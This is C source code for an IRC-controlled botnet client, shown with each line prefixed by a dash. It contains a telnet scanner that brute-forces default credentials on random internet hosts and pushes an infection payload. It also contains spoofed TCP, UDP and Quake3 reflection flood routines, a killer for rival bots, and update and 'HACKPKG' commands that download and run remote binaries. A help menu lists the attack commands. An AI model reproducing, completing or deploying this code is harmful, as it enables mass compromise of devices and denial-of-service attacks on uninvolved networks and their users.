- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- buffer = malloc(SOCKBUF_SIZE + 1);
- memset(buffer, 0, SOCKBUF_SIZE + 1);
- struct telstate_t fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for(i = 0; i < max; i++)
- {
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].complete = 1;
- fds[i].sockbuf = buffer;
- }
- while(1) {
- for(i = 0; i < max; i++) {
- if(fds[i].tTimeout == 0) {
- fds[i].tTimeout = time(NULL);
- }
- switch(fds[i].state) {
- case 0:
- {
- if(fds[i].complete == 1)
- {
- char *tmp = fds[i].sockbuf;
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].sockbuf = tmp;
- fds[i].ip = getRandomPublicIP();
- }
- else if(fds[i].complete == 0)
- {
- fds[i].usernameInd++;
- fds[i].passwordInd++;
- if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- if(fds[i].fd == -1) continue;
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- advance_telstate(&fds[i], 1);
- }
- }
- break;
- case 1:
- {
- FD_ZERO(&fdset);
- FD_SET(fds[i].fd, &fdset);
- tv.tv_sec = 0;
- tv.tv_usec = wait_usec;
- res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
- if(res == 1) {
- fds[i].tTimeout = 0;
- lon = sizeof(int);
- valopt = 0;
- getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if(valopt)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
- advance_telstate(&fds[i], 2);
- }
- continue;
- }
- else if(res == -1)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 2:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 3);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 3:
- {
- if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 4);
- }
- break;
- case 4:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 5);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 5:
- {
- if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 6);
- }
- break;
- case 6:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else if(contains_success(fds[i].sockbuf))
- {
- if(fds[i].complete == 2)
- {
- advance_telstate(&fds[i], 7);
- }
- else
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] LOGIN CRACKED ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- advance_telstate(&fds[i], 7);
- }
- }
- else
- {
- reset_telstate(&fds[i]);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 7:
- {
- fds[i].tTimeout = time(NULL);
- if(send(fds[i].fd, Telnet_Payload, strlen(Telnet_Payload), MSG_NOSIGNAL) < 0)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] SUCCESSFUL INFECTION ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- reset_telstate(&fds[i]);
- continue;
- }
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "REBIRTH"))
- {
- if(strcasestr(fds[i].sockbuf, "REBIRTH") && fds[i].complete != 3)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [+] PAYLOAD SENT ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- fds[i].complete = 3;
- }
- }
- if(fds[i].tTimeout + 45 < time(NULL))
- {
- if(fds[i].complete!=3)
- {
- Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED INFECTION ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
- }
- reset_telstate(&fds[i]);
- }
- break;
- }
- }
- }
- }
- }
- void startScanner(int sock) {
- uint32_t parent;
- parent = fork();
- int ii = 0;
- int forks = sysconf( _SC_NPROCESSORS_ONLN );
- int fds = 999999;
- if(forks == 1) fds = 500;
- if(forks >= 2) fds = 1000;
- if (parent > 0) {
- scanPid = parent;
- return;
- } else if(parent == -1) return;
- for (ii = 0; ii < forks; ii++) {
- srand((time(NULL) ^ getpid()) + getppid());
- init_rand(time(NULL) ^ getpid());
- TelnetScanner(100, fds, sock);
- _exit(0);
- }
- }
- void botkill() {
- int i;
- FILE *fp;
- char path[1024];
- char *PID[8];
- char *command[128];
- for (i = 0; i < NUMITEMS(Bot_Killer_Binarys); i++) {
- printf("Scanning for %s\n", Bot_Killer_Binarys[i]);
- sprintf(command, "pidof -s %s", Bot_Killer_Binarys[i]);
- /* Open the command for reading. */
- fp = popen(command, "r");
- if (fp == NULL) {
- printf("Failed to run command\n" );
- return;
- }
- /* Read the output a line at a time - output it. */
- while (fgets(path, sizeof(path)-1, fp) != NULL) {
- sprintf(PID, "%s", path);
- }
- /* close */
- pclose(fp);
- if(atoi(PID) > 0) {
- printf("Botkilling %s PID %d\n", Bot_Killer_Binarys[i], PID);
- kill(atoi(PID), 9);
- } else if(1 == system(command)) {
- //A process having name PROCESS is NOT running.
- }
- }
- }
- char *getPublicIP() {
- int fd;
- struct ifreq ifr;
- fd = socket(AF_INET, SOCK_DGRAM, 0);
- ifr.ifr_addr.sa_family = AF_INET;
- snprintf(ifr.ifr_name, IFNAMSIZ, "eth0");
- ioctl(fd, SIOCGIFADDR, &ifr);
- /* and more importantly */
- printf("%s\n", inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
- close(fd);
- }
- void proxyflux(int sock, char *sender, int argc, char **argv) {
- if (mfork(sender) != 0) return;
- char *command[128];
- Send(sock, "NOTICE %s :[PROXY] [+] Starting proxy.\n", sender);
- sprintf(command, "nc -l -k -p ");
- strcat(command, PROXY_PORT);
- strcat(command, " -c \"nc ");
- strcat(command, SERVER_ADDR);
- strcat(command, " 6667\" &");
- system(command);
- Send(sock, "NOTICE %s :[PROXY] [+] Started proxy service on %s:%d\n", sender, getPublicIP(), PROXY_PORT);
- pthread_exit(NULL);
- exit(0);
- }
- struct alist
- {
- struct sockaddr_in data;
- struct list *next;
- struct list *prev;
- };
- struct list *head;
- volatile int tehport;
- volatile int limiter;
- volatile unsigned int pps;
- volatile unsigned int sleeptime = 100;
- struct quakethread_data{ int thread_id; struct alist *list_node; struct sockaddr_in sin; };
- void setup_ip_header(struct iphdr *iph)
- {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
- iph->id = htonl(54321);
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = IPPROTO_UDP;
- iph->check = 0;
- iph->saddr = inet_addr("192.168.3.100");
- }
- void setup_quake_udp_header(struct udphdr *udph)
- {
- udph->source = htons(5678);
- udph->dest = htons(27960);
- udph->check = 0;
- memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
- udph->len=htons(sizeof(struct udphdr) + 14);
- }
- void *quakeflood(void *par1)
- {
- struct quakethread_data *td = (struct quakethread_data *)par1;
- char datagram[MAX_PACKET_SIZE];
- struct iphdr *iph = (struct iphdr *)datagram;
- struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
- struct sockaddr_in sin = td->sin;
- struct alist *list_node = td->list_node;
- int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
- if(s < 0){
- fprintf(stderr, "Could not open raw socket.\n");
- exit(-1);
- }
- init_rand(time(NULL));
- memset(datagram, 0, MAX_PACKET_SIZE);
- setup_ip_header(iph);
- setup_quake_udp_header(udph);
- udph->source = htons(rand() % 65535 - 1026);
- iph->saddr = sin.sin_addr.s_addr;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
- int tmp = 1;
- const int *val = &tmp;
- if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
- fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
- exit(-1);
- }
- init_rand(time(NULL));
- register unsigned int i;
- i = 0;
- while(1){
- sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
- list_node = list_node->next;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
- iph->check = ccsum ((unsigned short *) datagram, iph->tot_len >> 1);
- pps++;
- if(i >= limiter)
- {
- i = 0;
- usleep(sleeptime);
- }
- i++;
- }
- }
- void quake3(int sock, char *sender, int argc, char *argv[])
- {
- if (mfork(sender) != 0) return;
- char *command[128];
- if(argc < 6) {
- Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);
- exit(-1);
- }
- srand(time(NULL));
- int i = 0;
- head = NULL;
- fprintf(stdout, "Setting up sockets...\n");
- int max_len = 128;
- char *buffer = (char *) malloc(max_len);
- buffer = memset(buffer, 0x00, max_len);
- int num_threads = atoi(argv[4]);
- int maxpps = atoi(argv[5]);
- limiter = 0;
- pps = 0;
- int multiplier = 20;
- sprintf(command, "wget \"%s\" -O QUAKE3.txt", argv[3]);
- system(command);
- Send(sock, "NOTICE %s :QUAKE3 Amp attacking %s:%s\n", sender, argv[1], argv[2]);
- FILE *list_fd = fopen("QUAKE3.txt", "r");
- while (fgets(buffer, max_len, list_fd) != NULL) {
- if ((buffer[strlen(buffer) - 1] == '\n') ||
- (buffer[strlen(buffer) - 1] == '\r')) {
- buffer[strlen(buffer) - 1] = 0x00;
- if(head == NULL)
- {
- head = (struct alist *)malloc(sizeof(struct alist));
- bzero(&head->data, sizeof(head->data));
- head->data.sin_addr.s_addr=inet_addr(buffer);
- head->next = head;
- head->prev = head;
- } else {
- struct alist *new_node = (struct alist *)malloc(sizeof(struct alist));
- memset(new_node, 0x00, sizeof(struct alist));
- new_node->data.sin_addr.s_addr=inet_addr(buffer);
- new_node->prev = head;
- new_node->next = head->next;
- head->next = new_node;
- }
- i++;
- } else {
- continue;
- }
- }
- struct alist *current = head->next;
- pthread_t thread[num_threads];
- struct sockaddr_in sin;
- sin.sin_family = AF_INET;
- sin.sin_addr.s_addr = inet_addr(argv[1]);
- struct quakethread_data td[num_threads];
- for(i = 0;i<num_threads;i++){
- td[i].thread_id = i;
- td[i].sin= sin;
- td[i].list_node = current;
- pthread_create( &thread[i], NULL, &quakeflood, (void *) &td[i]);
- }
- fprintf(stdout, "Starting flood...\n");
- for(i = 0;i<(atoi(argv[6])*multiplier);i++)
- {
- usleep((1000/multiplier)*1000);
- if((pps*multiplier) > maxpps)
- {
- if(1 > limiter)
- {
- sleeptime+=100;
- } else {
- limiter--;
- }
- } else {
- limiter++;
- if(sleeptime > 25)
- {
- sleeptime-=25;
- } else {
- sleeptime = 0;
- }
- }
- pps = 0;
- }
- }
- int listFork() {
- uint32_t parent, *newpids, i;
- parent = fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids = (uint32_t*)malloc((numpids + 1) * 4);
- for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
- newpids[numpids - 1] = parent;
- free(pids);
- pids = newpids;
- return parent;
- }
- void SendTheSTD(unsigned char *ip, int port, int secs) {
- int iSTD_Sock;
- iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
- time_t start = time(NULL);
- struct sockaddr_in sin;
- struct hostent *hp;
- hp = gethostbyname(ip);
- bzero((char*) &sin,sizeof(sin));
- bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
- sin.sin_family = hp->h_addrtype;
- sin.sin_port = port;
- unsigned int a = 0;
- while(1){
- if (a >= 50) {
- send(iSTD_Sock, "std", 69, 0);
- connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
- if (time(NULL) >= start + secs) {
- close(iSTD_Sock);
- _exit(0);
- }
- a = 0;
- }
- a++;
- }
- }
- void sendSTD(int sock, char *sender, int argc, char **argv) {
- //!* STD TARGET PORT TIME
- if (mfork(sender) != 0) return;
- if(argc < 3) {
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender);
- exit(1);
- }
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- if(strstr(ip, ",") != NULL) {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL) {
- if(!listFork()) {
- Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
- SendTheSTD(hi, port, time);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- } else {
- if (listFork()) {
- exit(1);
- }
- Send(sock, "NOTICE %s :STD attacking %s:%s\n", sender,argv[1],argv[2]);
- SendTheSTD(ip, port, time);
- _exit(0);
- }
- }
- int getHost(unsigned char *toGet, struct in_addr *i) {
- struct hostent *h;
- if((i->s_addr = inet_addr(toGet)) == -1) return 1;
- return 0;
- }
- void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + packetSize;
- iph->id = rand_cmwc();
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = protocol;
- iph->check = 0;
- iph->saddr = source;
- iph->daddr = dest;
- }
- void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
- register unsigned int pollRegister;
- pollRegister = pollinterval;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- if(port == 0) dest_addr.sin_port = rand_cmwc();
- else dest_addr.sin_port = htons(port);
- if(getHost(target, &dest_addr.sin_addr)) return;
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
- if(!sockfd) { return; }
- int tmp = 1;
- if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
- in_addr_t netmask;
- if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
- else netmask = ( ~((1 << (32 - spoofit)) - 1) );
- unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
- struct iphdr *iph = (struct iphdr *)packet;
- struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
- makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomPublicIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
- tcph->source = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->ack_seq = 0;
- tcph->doff = 5;
- if(!strcmp(flags, "all")) {
- tcph->syn = 1;
- tcph->rst = 1;
- tcph->fin = 1;
- tcph->ack = 1;
- tcph->psh = 1;
- } else {
- unsigned char *pch = strtok(flags, ",");
- while(pch) {
- if(!strcmp(pch, "syn")) { tcph->syn = 1;
- } else if(!strcmp(pch, "rst")) { tcph->rst = 1;
- } else if(!strcmp(pch, "fin")) { tcph->fin = 1;
- } else if(!strcmp(pch, "ack")) { tcph->ack = 1;
- } else if(!strcmp(pch, "psh")) { tcph->psh = 1;
- } else {
- }
- pch = strtok(NULL, ",");
- }
- }
- tcph->window = rand_cmwc();
- tcph->check = 0;
- tcph->urg_ptr = 0;
- tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
- tcph->check = ccsum(iph, tcph);
- iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
- int end = time(NULL) + timeEnd;
- register unsigned int i = 0;
- while(1) {
- sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
- iph->saddr = htonl( getRandomPublicIP(netmask) );
- iph->id = rand_cmwc();
- tcph->seq = rand_cmwc();
- tcph->source = rand_cmwc();
- tcph->check = 0;
- tcph->check = ccsum(iph, tcph);
- iph->check = ccsum ((unsigned short *) packet, iph->tot_len);
- if(i == pollRegister) {
- if(time(NULL) > end) break;
- i = 0;
- continue;
- }
- i++;
- }
- }
- void tcpflood(int sock, char *sender, int argc, char **argv) {
- if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1)) {
- Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender);
- return;
- }
- if (mfork(sender) != 0) return;
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- unsigned char *flags = argv[4];
- int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
- int packetsize = argc > 5 ? atoi(argv[5]) : 0;
- int spoofed = 32;
- if(strstr(ip, ",") != NULL) {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL) {
- if(!listFork()) {
- Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, hi, port, flags);
- SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- } else {
- if (listFork()) {
- return;
- }
- Send(sock, "NOTICE %s :TCP flooding %s:%d with flags %s\n", sender, ip, port, flags);
- SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
- _exit(0);
- }
- }
- void update(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- unsigned char dgcc;
- char buf[1024], *file;
- FILE *gcc;
- int parent=getpid();
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :UPDATEHTTP <host> <src:bin>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n", sender);
- exit(0);
- }
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(argv[1])) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(argv[1])) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- gcc=popen("gcc --help","r");
- if (gcc != NULL) {
- memset(buf,0,1024);
- fgets(buf,1024,gcc);
- if (!strstr(buf,"Usage")) dgcc=0;
- else dgcc=1;
- pclose(gcc);
- } else dgcc=0;
- for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);
- argv[2][i]=0;
- if (dgcc) file=argv[2];
- else file=argv[2]+i+1;
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);
- Send(sock, "NOTICE %s :Receiving update.\n", sender);
- system("mkdir /tmp");
- if (dgcc) {
- FILE *file=fopen("/tmp/.c","wb");
- char bufm[4096];
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- memset(buf,0,4096);
- sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
- }
- else {
- FILE *file=fopen("/tmp/.o","wb");
- unsigned char bufm[4096];
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done2;
- }
- }
- done2:
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- memset(buf,0,4096);
- //sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);
- //sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");
- sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");
- }
- close(sock);
- close(sock2);
- system(buf);
- kill(9,0);
- exit(0);
- }
- void move(int sock, char *sender, int argc, char **argv) {
- if (argc < 1) {
- Send(sock, "NOTICE %s :MOVE <server>\n", sender);
- exit(1);
- }
- server=strdup(argv[1]);
- changeservers=1;
- close(sock);
- }
- void hackpkg(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- char buf[1024];
- FILE *file;
- mkdir("/var/bin", 0775);
- unsigned char bufm[4096];
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :HACKPGK <url> <binary name>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
- exit(0);
- }
- if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
- else strcpy(buf,argv[1]);
- for (i=0;i<strlen(buf) && buf[i] != '/';i++);
- buf[i]=0;
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(buf)) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(buf)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
- Send(sock, "NOTICE %s :Receiving file.\n", sender);
- file=fopen(argv[2],"wb");
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- Send(sock, "NOTICE %s :Installed %s to hack path.\n", sender,argv[2]);
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- close(sock2);
- char MoveIt[255];
- sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);
- system(MoveIt);
- char DeleteIt[255];
- sprintf(DeleteIt, "rm %s",argv[2],argv[2]);
- system(DeleteIt);
- char String[255];
- sprintf(String, "chmod 775 /var/bin/%s",argv[2]);
- system(String);
- char String2[255];
- sprintf(String2, "ls -l /var/bin/%s",argv[2]);
- system(String2);
- exit(0);
- }
- void help(int sock, char *sender, int argc, char **argv) {
- if (mfork(sender) != 0) return;
- Send(sock, "NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n", sender); sleep(1);
- Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n", sender); sleep(1);
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :NICK <nick> = Changes the nick of the client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SERVER <server> = Changes servers\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETSPOOFS = Gets the current spoofing\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n", sender); sleep(1);
- Send(sock, "NOTICE %s :DISABLE = Disables all packeting from this client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :ENABLE = Enables all packeting from this client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :KILL = Kills the client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UPDATE <http address> <src:bin> = Update this bot\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n", sender); sleep(1);
- Send(sock, "NOTICE %s :VERSION = Requests version of client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :KILLALL = Kills all current packeting\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HELP = Displays this\n", sender); sleep(1);
- Send(sock, "NOTICE %s :IRC <command> = Sends this command to the server\n", sender); sleep(1);
